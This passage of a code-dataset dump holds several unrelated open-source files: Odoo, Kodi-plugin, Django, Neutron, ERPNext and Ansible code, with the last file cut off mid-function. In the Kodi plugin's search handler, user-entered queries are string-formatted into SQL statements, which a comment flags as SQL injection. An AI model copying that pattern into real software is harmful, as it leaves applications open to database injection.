repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
luiseduardohdbackup/odoo | addons/sale_order_dates/__openerp__.py | 260 | 1771 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest: metadata the server reads when discovering
# and installing the "sale_order_dates" module.
{
    'name': 'Dates on Sales Order',
    'version': '1.1',
    'category': 'Sales Management',
    'description': """
Add additional date information to the sales order.
===================================================
You can add the following additional dates to a sales order:
------------------------------------------------------------
* Requested Date (will be used as the expected date on pickings)
* Commitment Date
* Effective Date
""",
    'author': 'OpenERP SA',
    'website': 'https://www.odoo.com/page/crm',
    # sale_stock is needed so the requested date can drive picking schedules.
    'depends': ['sale_stock'],
    # View inheritance adding the extra date fields to the sale order form.
    'data': ['sale_order_dates_view.xml'],
    'demo': [],
    'test': ['test/requested_date.yml'],
    'installable': True,
    # Never installed automatically just because dependencies are present.
    'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
chimkentec/KodiMODo_rep | plugin.video.zona.mobi.dev/core/list.py | 2 | 12957 | # -*- coding: utf-8 -*-
import os, re, sys, json, urllib, hashlib, traceback
import xbmcup.app, xbmcup.db, xbmcup.system, xbmcup.net, xbmcup.parser, xbmcup.gui
import xbmc, cover, xbmcplugin, xbmcgui
from http import HttpData
from common import Render
from defines import *
try:
    from sqlite3 import dbapi2 as sqlite
except:
    # Old Python builds without the stdlib sqlite3 module: fall back to
    # the external pysqlite2 package under the same local name.
    from pysqlite2 import dbapi2 as sqlite

# Module-wide response cache and search-history store, both backed by the
# add-on's sandboxed cache database file.
CACHE = xbmcup.db.Cache(xbmcup.system.fs('sandbox://'+CACHE_DATABASE))
SQL = xbmcup.db.SQL(xbmcup.system.fs('sandbox://'+CACHE_DATABASE))
class AbstactList(xbmcup.app.Handler, HttpData, Render):
    # NOTE(review): "AbstactList" looks like a typo for "AbstractList";
    # kept as-is because the subclasses below reference this exact name.

    def add_movies(self, response, ifempty=30111):
        """Render one folder row per movie in *response*, or an info row.

        response -- dict with a 'data' list of movie dicts (keys used:
            name, year, rating, url, img) as produced by get_movies.
        ifempty  -- language-string id shown when the result list is empty.
        """
        if(len(response['data']) > 0):
            for movie in response['data']:
                menu = []  # no extra context-menu entries for list rows
                self.item(movie['name']+' '+movie['year']+' '+movie['rating'],
                    self.link('quality-list', {'movie_page' : movie['url'], 'cover' : movie['img']}),
                    folder=True, cover=movie['img'], menu=menu)
        else:
            # Empty result set: show a single red, non-clickable info row.
            self.item(u'[COLOR red]['+xbmcup.app.lang[ifempty]+'][/COLOR]', self.link('null'), folder=False, cover=cover.info)
class MovieList(AbstactList):
    def handle(self):
        """Render one page of the movie catalogue with prev/next rows."""
        params = self.argv[0]
        try:
            page = int(params['page'])
        except:
            # First entry (no page in params): start at page 0.
            params['page'] = 0
            page = 0
        if(params['dir']):
            page_url = "/"+params['dir']+"/"
        else:
            page_url = '/'
        md5 = hashlib.md5()
        if(page_url == '/'):
            # Root listing: the cache key is derived from the sub-directory.
            # NOTE(review): the key does not include the page number here
            # (the other branch uses str(page)) — looks like different pages
            # of the root listing could share one cache entry; confirm
            # against CACHE semantics.
            md5.update(page_url+'/page/'+params['sub_dir'])
            response = CACHE(str(md5.hexdigest()), self.get_movies, page_url, page, params['sub_dir'], False, '', 'vlist-item')
        else:
            md5.update(page_url+'/page/'+str(page))
            response = CACHE(str(md5.hexdigest()), self.get_movies, page_url, page)
        if(response['page']['pagenum'] > 1):
            # "Previous page" navigation row.
            params['page'] = page-1
            self.item('[COLOR green]'+xbmcup.app.lang[30106]+'[/COLOR]', self.replace('list', params), folder=True, cover=cover.prev)
            params['page'] = page+1
        self.add_movies(response)
        params['page'] = page+1
        if(response['page']['maxpage'] >= response['page']['pagenum']+1):
            # "Next page" navigation row.
            self.item('[COLOR green]'+xbmcup.app.lang[30107]+'[/COLOR]', self.replace('list', params), folder=True, cover=cover.next)
class SearchList(AbstactList):
    def handle(self):
        """Prompt for (or reuse) a search query, run it, render results.

        State arrives via self.argv[0]; 'usersearch'/'vsearch' are present
        when the handler is re-entered for pagination, and absent on first
        entry (then the history dialog / on-screen keyboard is shown).
        """
        try:
            params = self.argv[0]
        except:
            params = {}
        try:
            page = int(params['page'])
        except:
            params['page'] = 0
            page = 0
        history = []
        # Maximum number of stored queries, from the add-on settings.
        try:
            req_count = int(xbmcup.app.setting['search_history'])
        except:
            req_count = 0
        try:
            # Pagination re-entry: the query was already chosen earlier.
            usersearch = params['usersearch']
            vsearch = params['vsearch']
        except:
            # First entry: offer saved history (or wipe it when disabled).
            history = []
            if(req_count > 0):
                SQL.set('create table if not exists search(id INTEGER PRIMARY KEY AUTOINCREMENT, value varchar(255) unique)')
                history = SQL.get('SELECT id,value FROM search ORDER BY ID DESC')
            else:
                SQL.set('DELETE FROM search')
            if(len(history)):
                history = list(history)
                # Index 0 of the dialog is the "new search" action.
                values = ['[COLOR yellow]'+xbmcup.app.lang[30108]+'[/COLOR]']
                for item in history:
                    values.append(item[1])
                ret = xbmcup.gui.select(xbmcup.app.lang[30161], values)
                if ret == None:
                    return  # dialog cancelled
                if(ret > 0):
                    # Reuse a saved query.
                    usersearch = values[ret]
                    vsearch = usersearch.encode('utf-8').decode('utf-8')
                    params['vsearch'] = vsearch
                    params['usersearch'] = urllib.quote_plus(usersearch.encode('utf-8'))
                else:
                    params['vsearch'] = ''
            else:
                params['vsearch'] = ''
        if(params['vsearch'] == ''):
            # No query selected yet: ask the user via the on-screen keyboard.
            keyboard = xbmc.Keyboard()
            keyboard.setHeading(xbmcup.app.lang[30112])
            keyboard.doModal()
            usersearch = keyboard.getText(0)
            vsearch = usersearch.decode('utf-8')
            params['vsearch'] = vsearch
            params['usersearch'] = urllib.quote_plus(usersearch)
            if not usersearch: return
            # NOTE(review): the user-entered query is interpolated straight
            # into the SQL text — a value containing a double quote breaks
            # the statement (SQL injection). Should use parameterized
            # queries if xbmcup.db.SQL supports them; flagged, not changed.
            try:
                SQL.set('INSERT INTO search (value) VALUES ("%s")' % (vsearch))
            except sqlite.IntegrityError:
                # Duplicate query: re-insert so it moves to the top.
                SQL.set('DELETE FROM search WHERE `value` = "%s"' % (vsearch))
                SQL.set('INSERT INTO search (value) VALUES ("%s")' % (vsearch))
            except:
                pass
            if(len(history) >= req_count):
                # Keep the history bounded: drop the oldest entry.
                SQL.set('DELETE FROM search WHERE `id` = (SELECT MIN(id) FROM search)')
        #page_url = "search/index/index/usersearch/"+params['usersearch']
        page_url = "search/%s" % (params['usersearch'])
        md5 = hashlib.md5()
        #md5.update(page_url+'/page/'+str(page))
        md5.update(page_url+'?page='+str(page))
        response = CACHE(str(md5.hexdigest()), self.get_movies, page_url, page, '', False, usersearch)
        # Header rows: "new search" action and the current query.
        self.item(u'[COLOR yellow]'+xbmcup.app.lang[30108]+'[/COLOR]', self.link('search'), folder=True, cover=cover.search)
        self.item('[COLOR blue]['+xbmcup.app.lang[30109]+': '+vsearch+'][/COLOR]',
            self.link('null'), folder=False, cover=cover.info)
        if(response['page']['pagenum'] > 1):
            params['page'] = page-1
            self.item('[COLOR green]'+xbmcup.app.lang[30106]+'[/COLOR]', self.replace('search', params), folder=True, cover=cover.prev)
            params['page'] = page+1
        self.add_movies(response)
        params['page'] = page+1
        if(response['page']['maxpage'] >= response['page']['pagenum']+1):
            self.item(u'[COLOR green]'+xbmcup.app.lang[30107]+'[/COLOR]', self.replace('search', params), folder=True, cover=cover.next)
class AbstractViewer(AbstactList):
    def get_info(self):
        """Map self.movieInfo onto the XBMC/Kodi video info-label dict."""
        return {
            'Genre' : self.movieInfo['genres'],
            'year' : self.movieInfo['year'],
            'director' : self.movieInfo['director'],
            'rating' : self.movieInfo['ratingValue'],
            # 'durarion' is the (misspelled) key produced by the site
            # parser; kept verbatim.
            'duration' : self.movieInfo['durarion'],
            'votes' : self.movieInfo['ratingCount'],
            'plot' : self.movieInfo['description'],
            'title' : self.movieInfo['title'],
            'originaltitle' : self.movieInfo['title']
            # 'playcount' : 1,
            # 'date': '%d.%m.%Y',
            # 'count' : 12
        }

    def add_playable_item(self, movie, resolution):
        """Add one playable video row.

        movie      -- sequence: [0] is the URL or internal id, [1] (when
                      present) the display name.
        resolution -- quality key forwarded to the 'resolve' handler.
        """
        try:
            name = movie[1]
        except:
            # No explicit title: fall back to the URL's basename.
            name = os.path.basename(str(movie[0]))
        if(movie[0].find('http://') == -1):
            # Not a direct http link: route through the resolver handler.
            link = self.resolve('resolve', {'movie' : movie, 'quality': resolution})
        else:
            link = movie[0]
        self.item(name,
            link,
            folder=False,
            media='video',
            info=self.get_info(),
            cover = self.movieInfo['cover'],
            fanart = self.movieInfo['fanart']
        )

    def get_icon(self, quality):
        """Return the quality-badge icon for *quality*, or the default."""
        if(quality in cover.res_icon):
            return cover.res_icon[quality]
        else:
            return cover.res_icon['default']
class QualityList(AbstractViewer):
    def handle(self):
        """Entry point: pick which sub-view to render for one movie page.

        Dispatches to show_folders / show_quality_folder / show_episodes
        depending on how many folders and qualities the movie exposes.
        """
        self.params = self.argv[0]
        try:
            # movieInfo is forwarded when navigating within this movie,
            # sparing a re-fetch of the movie page.
            self.movieInfo = self.params['movieInfo']
        except:
            self.movieInfo = self.get_movie_info(self.params['movie_page'])
        try:
            self.params['sub_dir'] = int(self.params['sub_dir'])
        except:
            self.params['sub_dir'] = None
        #quality_settings = int(xbmcup.app.setting['quality'])
        #default_quality = QUALITYS[quality_settings]
        try:
            self.params['quality_dir'] = int(self.params['quality_dir'])
        except:
            self.params['quality_dir'] = None
        if(self.params['sub_dir'] == None):
            self.def_dir = 0
        else:
            self.def_dir= self.params['sub_dir']
        # Disabled default-quality auto-selection, kept for reference:
        # if(default_quality != None and self.params['quality_dir'] == None):
        #     try:
        #         test = self.movieInfo['movies'][self.def_dir]['movies'][default_quality]
        #         self.params['quality_dir'] = str(default_quality)
        #     except:
        #         if(xbmcup.app.setting['lowest_quality'] == 'true'):
        #             quality_settings -= 1
        #             if(quality_settings > 1):
        #                 try:
        #                     default_quality = str(QUALITYS[quality_settings])
        #                     test = self.movieInfo['movies'][self.def_dir]['movies'][default_quality]
        #                     self.params['quality_dir'] = default_quality
        #                 except:
        #                     quality_settings -= 1
        #                     if(quality_settings > 1):
        #                         try:
        #                             default_quality = str(QUALITYS[quality_settings])
        #                             test = self.movieInfo['movies'][self.def_dir]['movies'][default_quality]
        #                             self.params['quality_dir'] = default_quality
        #                         except:
        #                             pass
        # If the site exposes several folders of files (or reports none).
        if((len(self.movieInfo['movies']) > 1 and self.params['sub_dir'] == None) or self.movieInfo['no_files'] != None):
            self.show_folders()
        # If episodes exist in several different qualities.
        elif(self.movieInfo['episodes'] == True and
            len(self.movieInfo['movies'][self.def_dir]['movies']) > 1 and
            self.params['quality_dir'] == None):
            self.show_quality_folder()
        elif(self.movieInfo['episodes'] == True):
            self.show_episodes()

    def show_folders(self):
        """List the movie's sub-folders, or a "no files" info row."""
        if(self.movieInfo['no_files'] == None):
            i = 0
            for movie in self.movieInfo['movies']:
                self.item(movie['folder_title'],
                    self.link('quality-list',
                        {
                            # Folder index, consumed as sub_dir above.
                            'sub_dir' : i,
                            'movieInfo' : self.movieInfo
                        }
                    ),
                    folder=True,
                    cover = self.movieInfo['cover']
                )
                i = i+1
        else:
            self.item(u'[COLOR red]['+self.movieInfo['no_files'].decode('utf-8')+'][/COLOR]', self.link('null'), folder=False, cover=cover.info)

    def show_episodes(self):
        """Render the playable episode rows for the selected folder."""
        show_first_quality = False
        if(self.movieInfo['movies'][self.def_dir]['isSerial']):
            # Serials load their episode list lazily; cache it by URL hash.
            curl = self.movieInfo['movies'][self.def_dir]['folder_url']
            md5 = hashlib.md5()
            md5.update(curl)
            self.movieInfo['movies'][self.def_dir]['movies'] = CACHE(str(md5.hexdigest()), self.get_season_movies, curl)
            print self.movieInfo['movies'][self.def_dir]['movies']
        if(self.params['quality_dir']):
            movies = self.movieInfo['movies'][self.def_dir]['movies'][str(self.params['quality_dir'])]
        else:
            # No quality chosen: fall through to the first one available.
            show_first_quality = True
            movies = self.movieInfo['movies'][self.def_dir]['movies']
        if(show_first_quality):
            # Only the first quality bucket is rendered, then we stop.
            for quality in movies:
                for movie in movies[quality]:
                    self.add_playable_item(movie, str(self.params['quality_dir']))
                break
        else:
            for movie in movies:
                self.add_playable_item(movie, str(self.params['quality_dir']))
        self.render_items()

    def show_quality_folder(self):
        """List the available qualities (sorted ascending) as folders."""
        if(len(self.movieInfo['movies']) > 1):
            movies = self.movieInfo['movies'][self.params['sub_dir']]['movies']
        else:
            movies = self.movieInfo['movies'][0]['movies']
        resolutions = []
        for movie in movies:
            resolutions.append(int(movie))
        resolutions.sort()
        for movie in resolutions:
            # Quality 0 stands for the site's FLV stream.
            self.item((str(movie) if movie != 0 else 'FLV'),
                self.link('quality-list',
                    {
                        'sub_dir' : self.params['sub_dir'],
                        'quality_dir' : str(movie),
                        'movieInfo' : self.movieInfo
                    }
                ),
                folder=True,
                cover=self.get_icon(str(movie))
            )
| gpl-3.0 |
gholms/euca2ools | euca2ools/commands/ec2/deletevpngateway.py | 5 | 1643 | # Copyright 2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from requestbuilder import Arg
from euca2ools.commands.ec2 import EC2Request
class DeleteVpnGateway(EC2Request):
    """euca2ools command for the EC2 ``DeleteVpnGateway`` API call."""
    DESCRIPTION = 'Delete a virtual private gateway'
    # One required positional argument: the gateway ID, sent as the
    # VpnGatewayId request parameter.
    ARGS = [Arg('VpnGatewayId', metavar='VGATEWAY',
                help='ID of the virtual private gateway to delete (required)')]
| bsd-2-clause |
ArcherSys/ArcherSys | Lib/site-packages/django/views/decorators/clickjacking.py | 550 | 1759 | from functools import wraps
from django.utils.decorators import available_attrs
def xframe_options_deny(view_func):
    """
    Modifies a view function so its response has the X-Frame-Options HTTP
    header set to 'DENY' as long as the response doesn't already have that
    header set.

    e.g.

    @xframe_options_deny
    def some_view(request):
        ...
    """
    @wraps(view_func, assigned=available_attrs(view_func))
    def wrapped_view(*args, **kwargs):
        response = view_func(*args, **kwargs)
        # Respect an X-Frame-Options value the view already chose.
        if response.get('X-Frame-Options', None) is None:
            response['X-Frame-Options'] = 'DENY'
        return response
    return wrapped_view
def xframe_options_sameorigin(view_func):
    """
    Modifies a view function so its response has the X-Frame-Options HTTP
    header set to 'SAMEORIGIN' as long as the response doesn't already have
    that header set.

    e.g.

    @xframe_options_sameorigin
    def some_view(request):
        ...
    """
    @wraps(view_func, assigned=available_attrs(view_func))
    def wrapped_view(*args, **kwargs):
        response = view_func(*args, **kwargs)
        # Respect an X-Frame-Options value the view already chose.
        if response.get('X-Frame-Options', None) is None:
            response['X-Frame-Options'] = 'SAMEORIGIN'
        return response
    return wrapped_view
def xframe_options_exempt(view_func):
    """
    Modifies a view function by setting a response variable that instructs
    XFrameOptionsMiddleware to NOT set the X-Frame-Options HTTP header.

    e.g.

    @xframe_options_exempt
    def some_view(request):
        ...
    """
    @wraps(view_func, assigned=available_attrs(view_func))
    def wrapped_view(*args, **kwargs):
        response = view_func(*args, **kwargs)
        # Flag read by XFrameOptionsMiddleware to skip the header.
        response.xframe_options_exempt = True
        return response
    return wrapped_view
| mit |
MaximNevrov/neutron | neutron/db/migration/alembic_migrations/versions/mitaka/expand/13cfb89f881a_add_is_default_to_subnetpool.py | 9 | 1141 | # Copyright 2015 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""add is_default to subnetpool
Revision ID: 13cfb89f881a
Revises: 59cb5b6cf4d
Create Date: 2015-09-30 15:58:31.170153
"""
# Revision identifiers used by Alembic to chain migrations; this
# migration applies on top of 59cb5b6cf4d.
revision = '13cfb89f881a'
down_revision = '59cb5b6cf4d'
from alembic import op
import sqlalchemy as sa
from sqlalchemy import sql
def upgrade():
    """Add the ``is_default`` boolean column to ``subnetpools``.

    The column is NOT NULL with a server-side default of ``false``, so
    existing rows are backfilled as non-default subnet pools.
    """
    op.add_column('subnetpools',
                  sa.Column('is_default',
                            sa.Boolean(),
                            server_default=sql.false(),
                            nullable=False))
| apache-2.0 |
openlabs/nereid | trytond_nereid/tests/test_website.py | 6 | 2763 | # This file is part of Tryton & Nereid. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
import unittest
import json
import trytond.tests.test_tryton
from trytond.tests.test_tryton import POOL, USER, DB_NAME, CONTEXT
from trytond.transaction import Transaction
from nereid.testing import NereidTestCase
class TestWebsite(NereidTestCase):
    'Test Website'

    def setUp(self):
        # Install the nereid module and bind the Tryton model pools used
        # by the tests to attributes for convenience.
        trytond.tests.test_tryton.install_module('nereid')
        self.NereidWebsite = POOL.get('nereid.website')
        self.NereidWebsiteLocale = POOL.get('nereid.website.locale')
        self.NereidPermission = POOL.get('nereid.permission')
        self.NereidUser = POOL.get('nereid.user')
        self.Company = POOL.get('company.company')
        self.Currency = POOL.get('currency.currency')
        self.Language = POOL.get('ir.lang')
        self.Party = POOL.get('party.party')

    def setup_defaults(self):
        """
        Setup the defaults: a USD currency, a company, an en_US locale,
        and one website ("localhost") bound to them.
        """
        usd, = self.Currency.create([{
            'name': 'US Dollar',
            'code': 'USD',
            'symbol': '$',
        }])
        self.party, = self.Party.create([{
            'name': 'Openlabs',
        }])
        self.company, = self.Company.create([{
            'party': self.party,
            'currency': usd,
        }])
        en_us, = self.Language.search([('code', '=', 'en_US')])
        currency, = self.Currency.search([('code', '=', 'USD')])
        locale, = self.NereidWebsiteLocale.create([{
            'code': 'en_US',
            'language': en_us,
            'currency': currency,
        }])
        self.NereidWebsite.create([{
            'name': 'localhost',
            'company': self.company,
            'application_user': USER,
            'default_locale': locale,
        }])

    def test_0010_user_status(self):
        """
        Test that user status returns jsonified object on POST
        request.
        """
        with Transaction().start(DB_NAME, USER, context=CONTEXT):
            self.setup_defaults()
            app = self.get_app()
            with app.test_client() as c:
                # GET should serve the page normally.
                rv = c.get('/user_status')
                self.assertEqual(rv.status_code, 200)
                # POST should answer with a JSON status payload.
                # NOTE(review): 'logged_id' is the key the application
                # emits (likely a typo for 'logged_in' upstream); the test
                # must match it verbatim.
                rv = c.post('/user_status')
                data = json.loads(rv.data)
                self.assertEqual(data['status']['logged_id'], False)
                self.assertEqual(data['status']['messages'], [])
def suite():
    "Nereid test suite"
    loader = unittest.TestLoader()
    tests = unittest.TestSuite()
    # Collect every test_* method of TestWebsite into the suite.
    tests.addTests(loader.loadTestsFromTestCase(TestWebsite))
    return tests
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
| gpl-3.0 |
mbauskar/omnitech-demo-erpnext | erpnext/hr/doctype/holiday_list/holiday_list.py | 41 | 1984 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cint
from frappe.model.naming import make_autoname
from frappe import throw, _
from frappe.model.document import Document
class HolidayList(Document):
    def validate(self):
        # Frappe hook: runs on every save.
        self.update_default_holiday_list()

    def get_weekly_off_dates(self):
        """Append one 'holidays' child row per weekly-off day in the
        selected fiscal year, continuing from the highest existing idx."""
        self.validate_values()
        yr_start_date, yr_end_date = self.get_fy_start_end_dates()
        date_list = self.get_weekly_off_date_list(yr_start_date, yr_end_date)
        # Continue numbering after existing rows ([0,] guards empty table).
        last_idx = max([cint(d.idx) for d in self.get("holidays")] or [0,])
        for i, d in enumerate(date_list):
            ch = self.append('holidays', {})
            ch.description = self.weekly_off
            ch.holiday_date = d
            ch.idx = last_idx + i + 1

    def validate_values(self):
        # Both fields are required before weekly-off dates can be derived.
        if not self.fiscal_year:
            throw(_("Please select Fiscal Year"))
        if not self.weekly_off:
            throw(_("Please select weekly off day"))

    def get_fy_start_end_dates(self):
        """Return (year_start_date, year_end_date) of the fiscal year."""
        return frappe.db.sql("""select year_start_date, year_end_date
            from `tabFiscal Year` where name=%s""", (self.fiscal_year,))[0]

    def get_weekly_off_date_list(self, year_start_date, year_end_date):
        """Return every date in [start, end] falling on the weekly-off
        weekday (self.weekly_off, e.g. 'Sunday')."""
        from frappe.utils import getdate
        year_start_date, year_end_date = getdate(year_start_date), getdate(year_end_date)
        from dateutil import relativedelta
        from datetime import timedelta
        import calendar
        date_list = []
        # e.g. 'Sunday' -> calendar.SUNDAY (weekday constant).
        weekday = getattr(calendar, (self.weekly_off).upper())
        # First occurrence of that weekday on/after the year start.
        reference_date = year_start_date + relativedelta.relativedelta(weekday=weekday)
        while reference_date <= year_end_date:
            date_list.append(reference_date)
            reference_date += timedelta(days=7)
        return date_list

    def clear_table(self):
        # Remove all holiday child rows.
        self.set('holidays', [])

    def update_default_holiday_list(self):
        # Unset is_default on every holiday list of this fiscal year.
        # NOTE(review): this includes the current document itself — confirm
        # whether is_default is re-applied elsewhere after save.
        frappe.db.sql("""update `tabHoliday List` set is_default = 0
            where ifnull(is_default, 0) = 1 and fiscal_year = %s""", (self.fiscal_year,))
| agpl-3.0 |
damonkohler/sl4a | python/src/Mac/Modules/launch/launchsupport.py | 39 | 3391 | # This script generates a Python interface for an Apple Macintosh Manager.
# It uses the "bgen" package to generate C code.
# The function specifications are generated by scanning the mamager's header file,
# using the "scantools" package (customized for this particular manager).
import string
# Declarations that change for each manager
MODNAME = '_Launch' # The name of the module
OBJECTNAME = 'UNUSED' # The basic name of the objects used here
KIND = 'Record' # Usually 'Ptr' or 'Handle'
# The following is *usually* unchanged but may still require tuning
MODPREFIX = 'Launch' # The prefix for module-wide routines
OBJECTTYPE = OBJECTNAME + KIND # The C type used to represent them
OBJECTPREFIX = MODPREFIX + 'Obj' # The prefix for object methods
INPUTFILE = string.lower(MODPREFIX) + 'gen.py' # The file generated by the scanner
OUTPUTFILE = MODNAME + "module.c" # The file generated by this program
from macsupport import *
# Create the type objects
LSAcceptanceFlags = Type("LSAcceptanceFlags", "l")
LSInitializeFlags = Type("LSInitializeFlags", "l")
LSRequestedInfo = Type("LSRequestedInfo", "l")
LSRolesMask = Type("LSRolesMask", "l")
UniCharCount = Type("UniCharCount", "l")
OptCFStringRef = OpaqueByValueType("CFStringRef", "OptCFStringRefObj")
LSItemInfoRecord = OpaqueType("LSItemInfoRecord", "LSItemInfoRecord")
includestuff = includestuff + """
#if PY_VERSION_HEX < 0x02040000
PyObject *PyMac_GetOSErrException(void);
#endif
#include <ApplicationServices/ApplicationServices.h>
/*
** Optional CFStringRef. None will pass NULL
*/
static int
OptCFStringRefObj_Convert(PyObject *v, CFStringRef *spec)
{
if (v == Py_None) {
*spec = NULL;
return 1;
}
return CFStringRefObj_Convert(v, spec);
}
PyObject *
OptCFStringRefObj_New(CFStringRef it)
{
if (it == NULL) {
Py_INCREF(Py_None);
return Py_None;
}
return CFStringRefObj_New(it);
}
/*
** Convert LSItemInfoRecord to Python.
*/
PyObject *
LSItemInfoRecord_New(LSItemInfoRecord *it)
{
return Py_BuildValue("{s:is:O&s:O&s:O&s:O&s:i}",
"flags", it->flags,
"filetype", PyMac_BuildOSType, it->filetype,
"creator", PyMac_BuildOSType, it->creator,
"extension", OptCFStringRefObj_New, it->extension,
"iconFileName", OptCFStringRefObj_New, it->iconFileName,
"kindID", it->kindID);
}
"""
# From here on it's basically all boiler plate...
execfile(string.lower(MODPREFIX) + 'typetest.py')
# Create the generator groups and link them
module = MacModule(MODNAME, MODPREFIX, includestuff, finalstuff, initstuff)
##object = MyObjectDefinition(OBJECTNAME, OBJECTPREFIX, OBJECTTYPE)
##module.addobject(object)
# Create the generator classes used to populate the lists
Function = OSErrFunctionGenerator
##Method = OSErrMethodGenerator
# Create and populate the lists
functions = []
##methods = []
execfile(INPUTFILE)
# add the populated lists to the generator groups
# (in a different wordl the scan program would generate this)
for f in functions: module.add(f)
##for f in methods: object.add(f)
# generate output (open the output file as late as possible)
SetOutputFileName(OUTPUTFILE)
module.generate()
| apache-2.0 |
direvus/ansible | lib/ansible/modules/cloud/openstack/os_keystone_service.py | 34 | 5676 | #!/usr/bin/python
# Copyright 2016 Sam Yaple
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Module metadata consumed by ansible-doc and Ansible's validation tooling.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_keystone_service
short_description: Manage OpenStack Identity services
extends_documentation_fragment: openstack
author: "Sam Yaple (@SamYaple)"
version_added: "2.2"
description:
- Create, update, or delete OpenStack Identity service. If a service
with the supplied name already exists, it will be updated with the
new description and enabled attributes.
options:
name:
description:
- Name of the service
required: true
description:
description:
- Description of the service
enabled:
description:
- Is the service enabled
type: bool
default: 'yes'
service_type:
description:
- The type of service
required: true
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
availability_zone:
description:
- Ignored. Present for backwards compatibility
requirements:
- "python >= 2.7"
- "openstacksdk"
'''
EXAMPLES = '''
# Create a service for glance
- os_keystone_service:
cloud: mycloud
state: present
name: glance
service_type: image
description: OpenStack Image Service
# Delete a service
- os_keystone_service:
cloud: mycloud
state: absent
name: glance
service_type: image
'''
RETURN = '''
service:
description: Dictionary describing the service.
returned: On success when I(state) is 'present'
type: complex
contains:
id:
description: Service ID.
type: string
sample: "3292f020780b4d5baf27ff7e1d224c44"
name:
description: Service name.
type: string
sample: "glance"
service_type:
description: Service type.
type: string
sample: "image"
description:
description: Service description.
type: string
sample: "OpenStack Image Service"
enabled:
description: Service status.
type: boolean
sample: True
id:
description: The service ID.
returned: On success when I(state) is 'present'
type: string
sample: "3292f020780b4d5baf27ff7e1d224c44"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _needs_update(module, service):
if service.enabled != module.params['enabled']:
return True
if service.description is not None and \
service.description != module.params['description']:
return True
return False
def _system_state_change(module, service):
state = module.params['state']
if state == 'absent' and service:
return True
if state == 'present':
if service is None:
return True
return _needs_update(module, service)
return False
def main():
    """Ansible entry point: ensure the Keystone service is present/absent.

    Looks the service up by name + type, then creates, updates, deletes,
    or leaves it alone; exits via module.exit_json / fail_json.
    """
    argument_spec = openstack_full_argument_spec(
        description=dict(default=None),
        enabled=dict(default=True, type='bool'),
        name=dict(required=True),
        service_type=dict(required=True),
        state=dict(default='present', choices=['absent', 'present']),
    )
    module_kwargs = openstack_module_kwargs()
    module = AnsibleModule(argument_spec,
                           supports_check_mode=True,
                           **module_kwargs)

    description = module.params['description']
    enabled = module.params['enabled']
    name = module.params['name']
    state = module.params['state']
    service_type = module.params['service_type']

    sdk, cloud = openstack_cloud_from_module(module)
    try:
        services = cloud.search_services(name_or_id=name,
                                         filters=dict(type=service_type))

        # name + type must identify at most one service.
        if len(services) > 1:
            module.fail_json(msg='Service name %s and type %s are not unique' %
                             (name, service_type))
        elif len(services) == 1:
            service = services[0]
        else:
            service = None

        if module.check_mode:
            # Report the would-be change without touching anything.
            module.exit_json(changed=_system_state_change(module, service))

        if state == 'present':
            if service is None:
                # BUGFIX: previously hardcoded enabled=True, ignoring the
                # module's 'enabled' parameter on creation (the update
                # path below already honored it).
                service = cloud.create_service(name=name, description=description,
                                               type=service_type, enabled=enabled)
                changed = True
            else:
